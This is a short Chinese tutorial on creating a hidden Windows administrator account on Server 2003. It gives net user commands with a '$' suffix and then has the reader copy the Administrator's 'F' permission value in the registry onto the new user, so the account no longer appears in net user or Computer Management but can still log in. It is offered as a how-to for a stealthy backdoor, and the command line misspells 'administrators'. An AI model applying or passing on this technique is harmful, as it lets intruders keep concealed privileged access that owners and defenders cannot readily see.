实验环境:windwos server 2003
一般windwos下新建用户并加到管理员组:
net user test /add
net localgroup adminitrators test /add
这种情况下直接cmd下执行net user就会被看到新建的用户,比较容易被发现。
简单的隐藏一下,但在计算机管理里面会被发现:
net user test$ /add
net localgroup adminitrators test$ /add
先打开运行,然后输入regedit打开注册表,找到创建的test$用户,发现它的类型这里有一个0x3f2,这个用户的权限信息就是000003F2,把两个都导出。
然后将administartor的权限信息也导出。
然后将导出的test的权限信息替换成administrator的权限信息里的用户信息,也就是"F"部分。
然后点击test的用户信息和权限信息,将他们导入注册表。再将test$用户删除,发现cmd下和计算机管理都没有test$这个用户了。只有注册表里面有。
然后尝试test$用户登录,发现登录成功。
还有一些工具可以将注册表里面的信息也清除掉但是一样登录,但是因为电脑上暂时没有,所以等以后再写上。